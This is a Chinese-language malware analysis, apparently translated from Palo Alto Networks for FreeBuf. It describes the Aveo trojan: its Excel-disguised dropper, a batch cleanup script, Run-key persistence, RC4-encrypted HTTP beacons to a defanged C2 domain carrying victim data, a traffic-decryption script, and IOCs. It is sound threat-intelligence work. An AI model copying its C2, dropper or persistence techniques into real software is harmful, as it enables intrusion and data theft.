Aveo惡意軟體分析
Palo Alto Networks 發現了一個名為 Aveo 的惡意軟體家族,它針對日語用戶開發。Aveo 的名字來自於其二進位文件中的嵌入式調試字元串。Aveo 惡意軟體家族與 ForrmerFirstRAT 惡意軟體家族有密切的聯繫,二者都針對日語用戶。Aveo 會偽裝成 Microsoft Excel 文檔,並在執行時拋出誘餌文件。誘餌文檔與埼玉工業大學 Ido 實驗室的研究有關。執行後,Aveo 可以接收多種命令,這將允許攻擊者完全控制感染主機。
部署
Aevo 的樣本會偽裝成 Microsoft Excel 文檔,如下圖所示。值得注意的是,malware.exe 只是一個佔位符,原文件名未知。
該可執行文件其實是一個 WinRAR 的自解壓可執行文件,它會在執行時拋出誘餌文檔和 Aveo 木馬來運行。下圖就是拋出的誘餌文檔,在運行之後打開:
這個誘餌文檔是關於 Ido 實驗室 2016 年研究立項的信息。該文件列出了 16 名參加 CAVE 的名單,包括名字、單位以及郵件地址。這個文檔用日語書寫,文件名也是日文
CAVE研究會參加者.xls
,這些都表明該惡意軟體是針對日語用戶的。此外,Aveo 和 FormerFirstRAT 家族的相似性將會在稍後討論,這個討論將進一步支持該惡意軟體是針對日語用戶的。基礎設施
Aveo 木馬配置了以下域名來進行 HTTP 通信:
snoozetime
[.]
info
jack.ondo@mail.com 最早在 2015 年 5 月就註冊了,自那時起,該郵箱已經和以下三個 IP 地址關聯上了:
104
.202
.173
[.]
82107
.180
.36
[.]
17950
.63
.202
[.]
38所有這些 IP 地址都位於美國境內。
從 snoozetime[.]info 的 WHOIS 信息來看,註冊郵箱為jack.ondo@mail[.]com,註冊名為aygt5ruhrj aygt5ruhrj gerhjrt。根據這兩條線索進行拓展:
bluepaint
[.]
info
coinpack
[.]
info
7b7p
[.]
info
donkeyhaws
[.]
info
europcubit
[.]
com
jhmiyh
.ny
@gmail[.]com
844148030
@qq[.]com惡意軟體分析
在自解壓可執行文件運行後,一系列的文件釋出到文件系統中,其執行流如下:
當 mshelp32.exe 可執行程序運行時,首先讀取setting32.ini 文件,其中包含著誘餌文檔的名字。這一信息被用來構建一個批處理腳本,如下:
@echo off
copy"CAVE研究會參加者.xls"
"C:Documents and SettingsAdministratorDesktop8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.xls"
/Ydel
"CAVE研究會參加者.xls"
/F /Qdel
mshelp32.exe /F /Qdel
setting32.ini /F /Qdel
"C:Documents and SettingsAdministratorDesktop8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.exe"
/F /Qdel
%0
/F /Q該批處理腳本在一個新的進程中執行,在 Aveo 運行、誘餌文檔釋放後執行清理工作。
Aveo 惡意軟體家族
Aveo 惡意軟體會在開始運行一個安裝程序,該程序會複製自身到以下位置:%APPDATA%MMCMMC.exe如果因為某種原因,%APPDATA%MMC 目錄不能被創建,Aveo 將會使用 %TEMP% 來代替 %APPDATA%。惡意軟體自身複製完成後,將會在新的進程中以原文件名為參數執行 MMC.exe。當執行時,如果提供了這單個參數,惡意軟體將會刪除掉制定路徑內的文件。安裝完成後,Aveo 將會提取以下受害人信息通過 HTTP 傳到遠程控制伺服器上:
Unique victim
hash
IP AddressMicrosoft Windows version
Username
ANSI code page identifier
這個信息被送到 snoozetime[.]info上,像下面的 HTTP 請求樣例:
GET
/index.php?id=35467&1=ySxlp03YGm0-&2=yiFi6hjbFHf9UtL44RPQ&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ-&6=yipl9g--
HTTP/1.1Accept
: */*User-Agent
: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)Host
: snoozetime[.]infoCache-Control
: no-cache惡意軟體使用了 RC4 來對數據進行加密,使用 hello作為密鑰。如下圖所示,Aveo 和 FormerFirstRAT 的加密部分幾乎是相同的,只s是演算法和密鑰變了。
可以通過以下代碼來解密 HTTP 中傳輸的數據:
import
base64from
binasciiimport
*from
structimport
*from
wincryptoimport
CryptCreateHash, CryptHashData, CryptDeriveKey, CryptEncrypt, CryptDecryptCALG_RC4 =
0x6801
CALG_MD5 =0x8003
def
decrypt
(data)
:md5_hasher = CryptCreateHash(CALG_MD5)
CryptHashData(md5_hasher,
"hello"
)generated_key = CryptDeriveKey(md5_hasher, CALG_RC4)
decrypted_data = CryptDecrypt(generated_key, data)
return
decrypted_datafor
ain
"index.php?id=35467&1=niBo9x/bFG4-&2=yi9i6hjbAmD5TNPu5A--&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ-&6=yipl9g--"
.split("&"
)[1
:]:k,v = a.split(
"="
)decrypted = decrypt(base64.b64decode(v.replace(
"-"
,"="
)))"[+] Parameter {} Decrypted: {}"
.format(k, decrypted)運行以上代碼會產生以下結果:
[+]
Parameter
1Decrypted
:e8836687
[+]
Parameter
2Decrypted
: 172.16
.95
.184
[+]
Parameter
4Decrypted
: 6.1
.7601
.2
.1
[+]
Parameter
5Decrypted
:Josh
Grunzweig
[+]
Parameter
6Decrypted
: 1252在得到受害者信息後,惡意軟體會按照預期返回 OK。之後 Aveo 將會產生一個新的線程來負責處理 C&C 伺服器的命令,以及請求產生的互動式 Shell。Aveo 對註冊表進行以下設置,以指向惡意軟體的路徑,從而保證重新啟動後惡意軟體仍然可以持久工作:HKCUsoftwaremicrosoftwindowscurrentversion
unmsnetbridge然後命令處理程序進入輪詢等待,Aveo 會從 C&C 伺服器接收命令。雖然 Aveo 在等待響應,它也會執行隨機延遲,延遲時間在 0 到 3276 毫秒之間。如果 C&C 伺服器返回 toyota,會將間隔設置為 60 秒。Aveo 可以接收以下命令:
1.執行交互 Shell 命令
2.獲取文件屬性
3.寫入文件
4.讀取文件
5.驅動器列表
6.對路徑執行 DIR 命令
以下請求顯示了 C&C 伺服器發送 ipconfig 命令到 Aveo 的過程:
C&C 請求
GET
/index.php?id=35468&1=niBo9x/bFG4-
HTTP/1.1Accept
: */*User-Agent
: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)Host
: snoozetime[.]infoCache-Control
: no-cacheHTTP/1.0
200
OKContent-Type
: text/html; charset=utf-8Content-Length
: 11Server
: Werkzeug/0.11.10 Python/2.7.5Date
: Wed, 10 Aug 2016 16:00:11 GMTxca89
xb4J
x82B
?xa5
x05
xe8
[Decrypted]
1ipconfig
Aveo 響應
POST
/index.php?id=35469&1=niBo9x/bFG4-
HTTP/1.1Accept
: */*User-Agent
: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)Host
: snoozetime[.]infoContent-Length
: 1006Cache-Control
: no-cachexca
x38
x39
xb4
x4a
x82
x42
x3f
xa5
x05
xe8
xdb
xda
x74
x8b
x79
x39
x46
xf2
x42
x1f
xcd
x39
xf3
x65
x1d
xda
x49
x40
x6c
x5e
x6e
xab
x79
xc2
x44
xc3
xb0
x12
xfd
xe2
x84
x67
x0d
xa5
xd3
x50
x2d
x1c
x31
x4a
x9e
xcb
x3d
x08
xe6
x1b
x04
x85
xbf
x11
x0e
x96
x63
xcf
x71
xfe
xe4
x97
x2a
xdc
x12
x23
x4d
xcb
x0f
x93
x30
xbc
xa0
xc8
x4e
x4e
xd8
xdb
x33
xa2
xbe
xff
x5e
x89
x22
xb9
x16
xd1
xf0
x60
x71
x64
x7a
x10
xb8
x78
x76
xe5
x08
x90
x46
x30
xa3
xe2
x4e
xdc
x98
x11
x27
x62
x38
x00
xb4
x54
x6d
xd7
x5b
x19
x5f
x19
xb8
xd1
xf5
xc1
x9b
x97
xda
x84
x2c
xdd
x2d
x97
x0a
x69
x51
xd9
x31
x77
x4a
xe2
x7f
x5e
xc5
xaf
x02
x3c
x69
x9c
x5f
x94
x3e
x0c
x25
xce
x63
xa9
x43
xff
x34
x25
x42
x95
xa9
x1f
xaa
xdf
x2b
xa7
xb1
xc0
x3
[Truncated]
[Decrypted]
1ipconfig
Windows
IP
Configuration
Ethernet
adapter
Bluetooth
Network
Connection
:Media
State
. . . . . . . . . . . :Media
disconnected
Connection-specific
DNS
Suffix
. :[Truncated]
結論
Aveo 與 FormerFirstRAT 在多個特徵上都是一致的,包括加密模塊、代碼重用和 C&C 功能。正如前面討論的 FormerFirstRAT 樣本,這個惡意軟體家族看起來也是針對日語用戶。使用自解壓文件的 WinRAR 釋放誘餌文檔和 Aveo 的惡意軟體副本以及清理腳本。Palo Alto Networks 的客戶已經免受以下威脅:
1.AutoFocus 已經對這種威脅創建了跟蹤和監控
2.WildFire 歸類 Aveo 到惡意程序
3.C&C 域名列入 Threat Prevention 攔截黑名單
IOC
SHA256 哈希
9dccfdd2a503ef8614189225bbbac11ee6027590c577afcaada7e042e18625e2
8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d
C&C 域名
snoozetime
[.]
info
註冊表鍵值
HKCUsoftwaremicrosoftwindowscurrentversion
unmsnetbridge
文件路徑
%
APPDATA
%MMC
MMC
.exe
%TEMP
%MMC
MMC
.exe
*參考文章來源:
researchcenter
,由Avenger編譯,轉載請註明來自
FreeBuf.COM
。
※維基解密網站下線4小時,與《41號修訂案》有關?
※深入了解VoWiFi安全性
※【FB TV】一周「BUF大事件」
※Apache Tomcat再曝遠程代碼執行(CVE-2016-8735)
※案例分析:利用OAuth實施釣魚
TAG:FreeBuf |
※FireEye發布免費惡意程序分析軟體ToolBox
※「臟牛漏洞」惡意Root軟體分析報告
※基於USB armory 製作一個USB惡意軟體分析器
※部分Mac設備感染FruitFly惡意監控軟體
※部分 Mac 設備感染 FruitFly 惡意監控軟體
※黑客在CCleaner軟體中隱藏惡意軟體
※CIA Angelfire:專門感染Windows的惡意軟體框架
※第一起 | 國內惡意軟體用偽基站傳播Android惡意軟體
※微軟 Word 宏惡意軟體可以同時感染 Mac 和 Windows
※Photoshop結合AI軟體繪製創意的藝術線條圖形
※惡意軟體就在Docker容器中?
※引文分析軟體HistCite導入數據不成功?
※微軟官方詳細分析Fireball惡意軟體,其實它沒那麼可怕
※CIA Vault7針對Window系統定製惡意軟體平台
※Adobe意外泄漏圖片雲編輯軟體Nimbus
※AutoSAR軟體架構解析(二)
※WireX Botnet惡意軟體 攻擊安卓手機
※QakBot銀行惡意軟體導致大量 Active Directory 被鎖定
※美國DHS宣布將惡意軟體分析工具「REnigma」商業化